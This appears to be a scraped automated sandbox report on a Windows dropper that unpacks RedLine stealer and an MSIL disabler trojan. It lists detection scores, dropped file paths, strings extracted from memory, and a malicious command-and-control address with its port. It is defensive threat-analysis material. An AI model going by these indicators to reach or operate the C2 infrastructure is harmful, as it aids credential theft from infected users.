                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe100%AviraHEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe100%AviraHEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe100%AviraHEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe79%ReversingLabsWin32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe82%VirustotalBrowse
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exe32%VirustotalBrowse
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe85%ReversingLabsByteCode-MSIL.Trojan.Disabler
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe96%ReversingLabsByteCode-MSIL.Trojan.RedLine
                          SourceDetectionScannerLabelLinkDownload
                          0.0.file.exe.8d0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          1.2.fxV11fe.exe.a00000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          2.2.faC80kI.exe.a90000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          1.3.fxV11fe.exe.50f1820.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          4.0.bvr38xq.exe.d70000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          1.0.fxV11fe.exe.a00000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          0.2.file.exe.8d0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          2.0.faC80kI.exe.a90000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                          http://tempuri.org/0%URL Reputationsafe
                          http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id90%URL Reputationsafe
                          http://tempuri.org/Entity/Id80%URL Reputationsafe
                          193.233.20.11:41310%URL Reputationsafe
                          http://tempuri.org/Entity/Id50%URL Reputationsafe
                          http://tempuri.org/Entity/Id40%URL Reputationsafe
                          http://tempuri.org/Entity/Id70%URL Reputationsafe
                          http://tempuri.org/Entity/Id60%URL Reputationsafe
                          http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id200%URL Reputationsafe
                          http://tempuri.org/Entity/Id210%URL Reputationsafe
                          http://tempuri.org/Entity/Id220%URL Reputationsafe
                          http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                          http://go.mic0%URL Reputationsafe
                          http://tempuri.org/Entity/Id100%URL Reputationsafe
                          http://tempuri.org/Entity/Id110%URL Reputationsafe
                          http://tempuri.org/Entity/Id120%URL Reputationsafe
                          http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id130%URL Reputationsafe
                          http://tempuri.org/Entity/Id140%URL Reputationsafe
                          http://tempuri.org/Entity/Id150%URL Reputationsafe
                          http://tempuri.org/Entity/Id160%URL Reputationsafe
                          http://tempuri.org/Entity/Id170%URL Reputationsafe
                          http://tempuri.org/Entity/Id180%URL Reputationsafe
                          http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id190%URL Reputationsafe
                          http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id17Response0%URL Reputationsafe
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          193.233.20.11:4131true
                          • URL Reputation: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/faultPbvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabbvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinarybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id12Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id2Responsebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id21Responsebvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id9bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://tempuri.org/Entity/Id8bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tempuri.org/Entity/Id5bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Preparebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id4bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://tempuri.org/Entity/Id7bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://tempuri.org/Entity/Id6bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/Entity/Id19Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Entity/Id15Responsebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registerbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id6Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.ip.sb/ipfaC80kI.exe, 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, bvr38xq.exe.2.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/scbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id9Responsebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://tempuri.org/Entity/Id20bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://tempuri.org/Entity/Id21bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://tempuri.org/Entity/Id22bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issuebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id1Responsebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://go.micatn32.exe, 00000003.00000002.330597365.00000000006F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedbvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Replaybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegobvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binarybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingbvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trustbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id11bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id12bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id16Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id13bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id14bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id15bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id16bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Noncebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id17bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id18bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id5Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id19bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsbvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id10Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Renewbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id8Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentitybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://search.yahoo.com?fr=crmas_sfpfbvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
